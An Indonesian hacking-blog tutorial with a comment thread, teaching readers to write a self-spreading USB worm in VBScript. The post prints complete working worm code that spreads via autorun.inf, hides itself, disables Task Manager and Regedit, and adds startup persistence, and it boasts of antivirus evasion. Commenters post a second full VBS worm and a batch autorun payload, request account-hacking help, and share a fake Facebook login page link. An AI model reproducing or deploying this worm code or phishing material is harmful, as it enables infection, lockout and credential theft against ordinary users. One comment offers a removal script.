Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Membuat Virus Sederhana – Notepad

14 March 2009
Penulis:   · Kategori Artikel: Cracking, Virus

BINUS HACKER Binus Hacker Is Not Criminal Banner





Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.

Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :

‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next
‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘//–Manipulasi Registry–//
set kalong = createobject(”WScript.Shell”)
‘//–Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “
‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
‘//–Manip – Hilangkan menu Find, Folder Options, Run,  dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
‘//–Manip - Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”
‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”
‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode

 

Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.

He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.

BINUS HACKER Binus Hacker Chat and Forum

Komentar

215 Komentar Untuk “Membuat Virus Sederhana – Notepad
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. azuka pada 9 October 2008 5:48 pm

    bang.,,,,setelah qt copy code itu k notepad trus gmn in lg.apa jika copy ld FD trus kita colok k komputer orang lain langsung infect.tlong jelasin ya bang

  2. Trojan Horse W32.Sality pada 18 October 2008 7:01 am

    ….. !!!!

  3. Hangger pada 22 October 2008 12:44 am

    Mas,, gmana carany ngubah nm Virus diatas,,,,,

    code yG mana yang harus diubah….????????????????//???

  4. dorylinux pada 25 October 2008 9:41 am

    yang pesting ja gx ngerti isi and caranya………… pa lagi yang nanya hehehehe………. (mungkin)jasakomforum

  5. utuhwibowo pada 25 October 2008 11:00 am

    k4l0n6.dll.vbs

    itu ganti ajah ^_^

  6. Seven pada 12 November 2008 1:04 am

    bang Gmn cara ngapus file nya ????
    pake antivir pa????

  7. Sacks pada 20 November 2008 9:22 pm

    Hari Gini Maenin .vbs ? Kalong Lagi? 5 Menit Juga Beres Gw Benahin Lage…
    Wong Kalong.vbs Cuma Kopi Paste Dr Virus Ms32dll.vbs

  8. calavinqa pada 22 November 2008 9:50 am

    mas… saya cm minta untuk bisa hack FS pacar saya krn slama neh qta hub tapi qta gk blh sm2 tw Fs qta msing.. mhon bantuannya

  9. divax pada 23 December 2008 11:09 am

    mas,saya mau nta script virus moonlight B.C. karena saya masih penasaran ma ni virus.

  10. sucy pada 15 January 2009 9:01 pm

    Cara hack fs gmna mas..
    ksii tw donk..

  11. CAMP pada 6 February 2009 8:40 am

    kawan kawan buka notepad kalian salin scrib di bawah ini simpan dengan nama erwinda_putra.exe.vbs
    AWAS…!!!!
    virus ini sangat berbahaya…
    apapun yang terjadi bukan tanggungan saya…
    SALAM MESRA BUAT HACKER PADANG YE…
    SALAMAT UNTUK PENGHANCURKAN..

    =====================================================
    ‘El Magnifico MAN
    on error resume next
    dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
    atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe erwinda_putra.exe.vbs”
    set fs = createobject(”Scripting.FileSystemObject”)
    set mf = fs.getfile(Wscript.ScriptFullname)
    dim text,size
    size = mf.size
    check = mf.drive.drivetype
    set text=mf.openastextstream(1,-2)
    do while not text.atendofstream
    mysource=mysource&text.readline
    mysource=mysource & vbcrlf
    loop
    do
    Set winpath = fs.getspecialfolder(0)
    set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
    tf.attributes = 32
    set tf=fs.createtextfile(winpath & “\erwinda_putra.exe.vbs”,2,true)
    tf.write mysource
    tf.close
    set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
    tf.attributes = 39
    for each flashdrive in fs.drives
    If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
    set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
    tf.attributes =32
    set tf=fs.createtextfile(flashdrive.path &”\erwinda_putra.exe.vbs”,2,true)
    tf.write mysource
    tf.close
    set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
    tf.attributes =39
    set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
    tf.attributes = 32
    set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
    tf.write atr
    tf.close
    set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
    tf.attributes=39
    end if
    next
    set rg = createobject(”WScript.Shell”)
    rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\erwinda_putra.exe.vbs”
    rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,””
    rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
    if check 1 then
    Wscript.sleep 100000
    end if
    loop while check1
    set sd = createobject(”Wscript.shell”)
    sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

    do while year(now) >= 2008
    WScript.sleep 20000

    msgbox “salamaik tibo di virus camp_luck” & vbcrlf & _
    “ondeh sanak maaf stek yo awak masuak ka sistem sanak anok-anok” & vbcrlf & _
    “dunsanak komputer dunsanak awak kuasai stek dih. kini dunsanak masuak dalam permainan suruak manyuruan” & vbcrlf & _
    “iko permainan yang paten ma dunsanak” & vbcrlf & _
    vbcrlf & vbcrlf & _
    ” elok-elok selah dih dunsanak beko tajadi yang indak-indak ko” & vbcrlf & vbcrlf & _
    ” aaa kini saaiknyo ma dunsanak”

    loop
    ==========================================================
    OIA NE PROMOSI DIKIT…
    KALO KALIAN KEPENGEN BUAT VIRUS…
    GW BANYAK PROGRAM BUAT VIRUS..
    KUNJUNGI AJA IMAEL GW OK…
    NE…

    CAMP_LUCK@YAHOO.COM

    SAYA BAKAL NGIRIMIN NYA DEH…
    KHUSUS BUAT KAWAN2 OK..
    BYE..2

  12. CAMP pada 6 February 2009 8:44 am

    WAH CARA MENG HACK FS ORANG TUMAH GAMPANG BGT…
    ANDA CUKUP MENGETAHUI IMAEL FS YANG ANDA TUJU..
    WAH GAMPANG BANGET TUH…

    GINI AJA YA BOS NTAR KIRIMIN AJA GUA PESAN KOLO KEPENGEN LEBIH DITELNYA OK…

    NE IMEL GW…

    CAMP_LUCK@YAHOO.COM

    MOGA BERHASIL YE…

  13. tarrrrraa pada 6 February 2009 8:51 pm

    posting aja gak ngerti pa lagi gua!!! aduh …. aduh….

    pacar gua jg hacker tp doi hacker d palembang!!
    tapi sayang dia pelit gak mo ngasih to aku crna nyebarin virus!!!
    to: para hacker cwo yag ganteng2 ajarain tara dooooooooooooonnk!!!! love u all

  14. oliem pada 11 March 2009 1:15 am

    bg setelah di copi ke notepad trus di apain
    ;))
    apakah virus_a da langsung bekerja???

  15. newbie++ pada 1 April 2009 9:26 pm

    coba loe liat deh di,…

    http:\\charles-kaisar.blogspot.com

    di situ ada code virus batch…

    ====================================

    sedikit nanya nih, (maklum newbie++)

    mana sih yang bagus untuk bikin virus, vbs / batch / yang lain…

    :-) :-)

  16. maonanya pada 13 April 2009 7:26 pm

    mas saya mao nanya saya sempet dikasih shell sama temen tapi bentuk nya berupa notepad,cara gunain nya gimana yach??

    tolong kirimin donk ke email saya jawaban nya ayvasya_1@yahoo.com

    terimakasih yah..

  17. utuhwibowo pada 16 April 2009 6:17 am

    @Maonanya:
    Download putty klo mo make shellnya

    Masukkan login username + password
    SSH port 21

    Coba ajah :)

  18. as pada 12 May 2009 6:49 am

    ga bisa fs kali, notepad bukannya cuma bisa buat email?

  19. ucokers pada 12 May 2009 11:39 am

    uda ada yg tau g cara ngehack fb orang..atau ada sofwarenya gtu buat cari password yahoo orang…
    hiks
    hiks

  20. john_m pada 23 May 2009 8:11 am

    apa coding wat memperbanyak diri virus???(pake notepad, tolong jalaskan)

  21. roland pada 4 June 2009 7:12 am

    cam luck kirimi gw 1 yang keren dunk virusya

    soalnya ada yang sombong bisa ngapus secara manual ne,,,

  22. Lunar Filth pada 4 July 2009 4:32 am

    Hho,…

    Kalo newbie diajari tentang membuat virus notepad gini mah terlalu berat,.. mendingan yang memasukan skrip`a sedikit” dolo aj broo ;)

    Inget kalo mao buat virus tuuhh yang pertama mendingan belajar VB6 dolo asah logika Loo,..
    Jangan belajar ginian dolo yang ada nanti keder,eheuheuhe
    Ok dehh segitu dolo !

    __Salam Cyber__

  23. erick pada 15 July 2009 8:44 am

    ada yang tau kagak gimana caranya liat web cam nya lawan chating tanpa minta dari dia.
    thanks yeah…
    jawabannya di tunggu di erick.siregar@yahoo.com

  24. maw nannya pada 17 July 2009 1:06 am

    weleh..weleh…

    bingung kok ribet bgt ya…

  25. viruss.......... pada 20 July 2009 10:48 pm

    pd pinter apa malah goblokin orang semua c yg posting ama yg coment……lo koq pd gak mikir yg posting aja niru punya orang otomatis die gak bisa..cuma na ngekor…..jd coment 2 lo simpan aja gak usah tanya ma die

  26. redhacker pada 21 July 2009 5:22 am

    mas, cara kerjanya gmana? sy sudah berhail buat tp tidak bekerja?

  27. madworx pada 4 August 2009 10:22 am

    wuiihh..lg maen api nehh..resiko comptr angus nggk y???tuh klo dah dicopy,trus apa kudu running di “comnd prompt”???

  28. Devil pada 23 August 2009 1:06 am

    Mas ksi cara ne hack fb don. . . .
    Makasi! . . . . .

  29. galank pada 25 August 2009 8:48 pm

    mas kasih cra hck fs donk…

  30. tony pada 27 August 2009 4:15 pm

    hack fb? Mank bisa?cra na gmna?

  31. OOPScracker pada 2 September 2009 8:50 pm

    pake facebook freez aja bisa sedot disini selamat mencoba. setelah di donlod, buka rar, jalankan S/W, masukan alamat email yang ingin di crack, teken start, kalo dah puas teken stop freeze.. good luck

  32. ToFoLogic pada 18 September 2009 8:17 am

    Virus .vbs ya…..??
    klo kita ganti di filetype .vbs yang biasanya di jalanin pake wscript.
    trus di ganti application yang laen gmn…..
    Ga jln dunkz…. Hehehehe…..Hehheh

  33. un_h4ck3r pada 11 October 2009 11:51 am

    klik di [link]sini[/link] test percobaan.
    Cuman heran ga aa komen yg di bales……
    Kalo ga ngerti banyak software buat bikin virus kok.
    Kalo mau belajar, pelajari dulu apa yang terjadi ama regedit tuh. xixixixiixix
    Benerin regeditnya dulu baru bikin virus. Ntar ga bisa diilangin lagi.
    waxaxaxaxax

  34. Inzane pada 14 October 2009 2:15 am

    [Version]
    Signature=”$Chicago$”
    Provider=Fariskhi

    [DefaultInstall]
    AddReg=UnhookRegKey
    DelReg=del

    [UnhookRegKey]
    HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER”

    [del]
    HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
    HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
    HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
    HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
    HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
    HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
    HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
    HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
    HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
    HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger

    ===============================================================

    kalongxremoval.inf

  35. Hendra pada 15 October 2009 8:08 pm

    mas..boleh gabung gak coz saya pengen belajar ma mas

  36. banguncool pada 24 October 2009 11:22 pm

    nice info….

  37. wuahhhh pada 6 November 2009 5:27 am

    bang sya kan gaptek…
    saya mau wat virus yang sa bikin komputer mati total,,,
    dan g sa d apa2in,,,,

  38. wira pada 7 November 2009 7:29 am

    kemaren gua baru buat fake login facebook. n berhasil, sekarang gua bingung gimana caranya ya biar link gua di klik n gk dicurigai..

    ni contoh fakelogin yg gua buat

    http://facebookloginsystem.t35.com/facebook/index.html

  39. muhamad zaelani pada 15 November 2009 1:45 am

    mas,,, itu virus,,, lw udah jd langsung kena komputer kita,, atau paz ada flasdisk aja msk komputer,,,

  40. Rani pada 15 November 2009 10:09 am

    Mas,, minta tutorial’a dunk klo blh nd bs.

  41. Rock Lung pada 15 November 2009 11:17 pm

    wah ternyata disini isinya komplit…. salam kenal buat temen2.. semua… tolong dunk ajarkan yang lebih banyak lagi ma aku… thanx b 4 :)

  42. Ramdony pada 24 November 2009 11:35 pm

    Mas ada cara bikin virus Sality gak?? : )

  43. jleme kleng pada 1 December 2009 11:31 am

    apa se untung ny buat virus???
    yg ada malah kompi lo smua yg kna virus bru tao rasa!!!!!

  44. rhian vhafu pada 2 December 2009 3:19 am

    gw mao nanya ni..
    bsa gag qta bkin virus pke aplikasi java????
    klo bsa tlong ksh cntoh’a y…
    klo ga bsa alesan’a knp???
    trims..

  45. Ami16regedit01 pada 6 December 2009 9:18 am

    Wah pade pinter smua ne…ikutan donk.maksi bt vb6 eh vb it visual basic y? Hehe ne br org oon mo jd hacker wkwkwk

  46. wallrouseditionfive pada 7 December 2009 10:42 pm

    mangstav nhe,,, jadi tinggal colok ajj kan ya,, masalahnya ini virus ringan BANGED dah ah,, langsung kedetek…wkwkkwkwwkwk……

  47. EDO pada 11 December 2009 4:16 am

    mau donk jadi hacker…???
    gmn caranya supaya saya bisa jadi hacker baru??????????//
    ajari donk???????????

  48. dera pada 13 December 2009 9:09 pm

    wah wah wah pda mo bwt virus cmwa ne…
    lok mo ngerusak gmpang…!!!!
    ngapain wat virus…
    pukul za kompix pke HAMER…!!!!!
    aq jamin kompi kalian rusak total…..!!!!!!

  49. de_hunter pada 15 December 2009 1:04 am

    bang…..,,
    w ank bru neh,,,
    w pngen ngeblok fb di kampus w,bisa g????
    cranya gmn bang????
    tlung ajarin ya bang……
    krim ke e-mael w di:
    th3_hunter0flove@yahoo.com

  50. Maekel Raw pada 16 December 2009 12:59 pm

    beeeeh,,
    dari pada di rusakiiiinn,,,Komputernyaa…
    mending Di bakar aja buat mlm taun baruu,,
    kan rame ntuu..
    Org2 [ada bakar lauk..,,kita bakar CPU ajee..heheheheh..
    kan asik tuuu..
    wkwkwkwkwk

  51. dera pada 19 December 2009 8:21 pm

    kace k aq aza drpd dbakar bang maekel..
    hehehehe…
    SALAM PENGHANCURAN”)

    ******TOTAL ERROR******

  52. dera pada 19 December 2009 8:35 pm

    VIRUS…..VIRUS……DISINI ADA PESTA…….
    ………………………………………………………………….

    VIRUS…..VIRUS……DISINI ADA PESTA…….
    ………………………………………………………………….

    VIRUS…..VIRUS……DISINI ADA PESTA…….
    ………………………………………………………………….

    DATANG TAK DIJEMPUT…..PULANG PANGGILLAH TEMAN TEMAN…
    …………………………………………………………………………………………………………….

    WORM……AUTORUN…..TROJAN…..CONFICKER…..SALITY….VIRUT….ALMAN…
    …………………………………………………………………………………………………………………………….

    SATU KAMPUNG SEKALIAN………………………………………………………………………………

  53. apin pada 20 December 2009 8:56 pm

    bang saya juga ikut donk..kepengen belajar buat facebook fake login ajarin yah…

  54. andy pada 23 December 2009 5:43 am

    kak obatnya ya pa??

  55. Wahyudi pada 25 December 2009 10:48 pm

    MakasihBanyak Atas Virusnya

  56. sandy vincent pada 27 December 2009 4:04 am

    gw lumayan ni pirus worm ya wkwkwkwkwkwkw

  57. ardi Trseyum pada 29 December 2009 6:26 am

    kira2 bisa ga yah ngirim virusnya melalui internet,email atau sms di hp
    kalaw bisa kasih tau dong caranya,,,.

  58. the-khan pada 5 January 2010 2:41 am

    gmn cara krim virus malalui internet yach………..???
    bntuin donk………
    tlog brikan cntoh virusx yach………tp yg pke notepad or delphi

  59. kaido kid pada 11 January 2010 10:57 pm

    gimana buat antivirnya

  60. cha pada 20 January 2010 2:33 am

    Ok. .. si mas V gmn ni cara ganti nma virusnya?

  61. hacker7code pada 25 January 2010 1:10 am

    Tambahan…

    Inii virus efeknya g t’lalu bahaya….efek dari virus ini cuman mengganti tampilan dari
    windows…..tapi cukup bikin kaget juga!!! tapi yg penting gak ke-detect ama anti virus(setahu saya…../ TP GA TW MA ANVIR YG BARU… )

    note: :idea: “HANYA BEKERJA PADA WINDOWS XP” :idea:

    caranya:
    - buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… ) script di bawah ini:

    @echo off
    copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
    copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
    copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
    copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
    copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
    copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
    reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
    reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
    reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
    reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
    reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
    reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
    reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

    - lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
    - buat Autorun.inf dengan script:

    [autorun]
    open=nama_file.bat

    - lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
    - file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
    - copy file-file tsb ke CD
    - ENJOY!!

  62. aranih pada 26 January 2010 6:22 am

    bang klo saya mau msukin gambar..yg harus d’ubah kode virus’y yang mana’y…??
    :)

  63. dark hacker pada 27 January 2010 8:48 pm

    g jamanya vrus kalong dah basi

  64. chacha pada 6 February 2010 9:44 pm

    Bang Q mau tanya ni….

    Antivirus yg plg ampuh ap ya ???
    soalny wktu ntu laptop Q prnah jd sarangny virus…
    smpe’2 laptop Q d format ulang….
    pdhal Q ud coba pke smua anti virus, tp smuanya g berguna gitu bang…..
    terkhir Q pk smadav…..

    mohon bantuannya y bang….
    soalnya Q gaptek banget nich…..

  65. kabayan pada 9 February 2010 1:18 am

    taiiii……, tunggu virus terbaru gw….., klo cara2 di posting tu brarati bkn hsl karyanya, …….ttaaaiiiiii………., hack fb..gampang, hack fs gampang…., ttaaaiiii…….

  66. rini pada 12 February 2010 7:24 pm

    kak bgi dunk cara hack fb pake scrip yang dikirimin kmen

  67. paiz{z} pada 12 February 2010 7:52 pm

    bos tolong ajarin buat virus mke’ vb vimaker, skalian sm vbnya, key
    thx

  68. hvm70 pada 14 February 2010 10:52 am

    aneh.!

  69. saifulnamaku pada 16 February 2010 1:31 pm

    @chacha : setau w anvir yg paling mujarab wat ngebasmi virus internasional ya Kaspersky 2010. Buat ngebasmi virus lokal cukup ama pcmav ja, Virus psti bablas :)

  70. zzz pada 17 February 2010 9:49 pm

    Pertamax gan…

  71. bahasa_pemrograman pada 21 February 2010 5:16 am

    @mas CAMP : itu source code virus notepad yg dr mas namanya erwinda_putra.exe.vbs boleh diganti terserah gtu gak!??

  72. bojan pada 22 February 2010 7:23 pm

    bank..gimana cara membuat virus??saya bingung

  73. journal pada 27 February 2010 2:43 pm

    Keren……
    Ada yang tau cara betulin soun kompi yang hilang?

  74. abizzzz pada 28 February 2010 3:56 am

    bro gmn sih bro mn virus nya ah gak jls pun bro
    sini ngak dapt virus nya bro???
    di sana aja cuma ada pelit kali kau ama virus. makan tu virus byar kenyang kw kontol????jembut ma kw bro

  75. Expoison pada 28 February 2010 5:28 pm

    mas tolong ajarin saya buat virus dong

  76. senja pada 1 March 2010 2:39 am

    waw waw waw betol yahud,, eh temen2 ajaring gua dung gmn cranya jd hacker, cuma masalahnya ni gua jail cuma pake hape alias handphon masalah virus memvirus gua kagak paham, n mas yang ahli bidang pembobolan security system di mana aja bantuin gue ya ajarin gue, n mas tolong yang berdomisili d irc allnetwork, tolong bg2 shel donk,,

  77. Lucky pada 1 March 2010 7:02 am

    ??Fuih gampng tu crany
    benerin s0und kompi?
    Caranya
    klick kanan mw k0mputer
    terus plih properties
    dsitu muncul system properties
    klick hardware-lalu device manager
    nah disitu ada tulisan sound,video,
    klick(+) kalau ada wdm audio
    brarti n0rmal,(disini saya pake chipset VIA,
    cri aja di Usb bwahny s0und td?
    Crany klick kanan
    pd yg ditandai tanda seru
    lalu pilih properties
    ting9al next2 gt aja,
    yg pasti hrz pake kaset prog?
    C0ba pake monster past bs
    tergantung chipset pd c0m U.
    Kurang jelaz
    email: syarif_budis@yahoo.com

  78. Lucky pada 1 March 2010 7:08 am

    Halah tu viruz pasti
    keinjak semua
    ama anti virus
    McAfee?
    Lw g pke kapersky past
    deteck?

  79. dhanie pada 8 March 2010 6:25 am

    ajarin downk cara nghack fb bos…..

  80. ayam_jago pada 9 March 2010 12:39 pm

    wah lagi ada diskusi para pembuat virus… :D

  81. enhack pada 13 March 2010 9:58 am

    hey, , , mank gmn cr nghack fb orang ntu?????

  82. kye pada 16 March 2010 7:50 pm

    iya nieh,, cara hack fb gmna???
    tapi gak bisa diketahui,, takut2_y mungkin yang di hack lebih pinter…

  83. farid pada 17 March 2010 1:55 am

    aku mau tanya,gimana sih cara membuat virus sederhana dari notpad itu,tolong di jelaskan secara rinci dan jelas ya!!!

  84. irvan akatsuki pada 21 March 2010 3:06 am

    hmmmmmh…….para hacker memang jenius!

  85. breakfast66 pada 23 March 2010 1:48 am

    makasih atas info nya…..buat teman2 yang memberikan komentar nya…saya harapkan berilah komentar yang baik, klo mo menghina jangan di dalam negri…tunjukan kemampuan mu di luar sana…jangan cuma jago menghina karya orang…..good luck hacker indonesia…

  86. BANI pada 24 March 2010 2:19 pm

    VIRUS APAPUN AKAN GUE BASMI……

  87. sandro pada 25 March 2010 8:43 pm

    kirimin listing program cara membuat virus dong. terimakasih

  88. angel pada 25 March 2010 11:21 pm

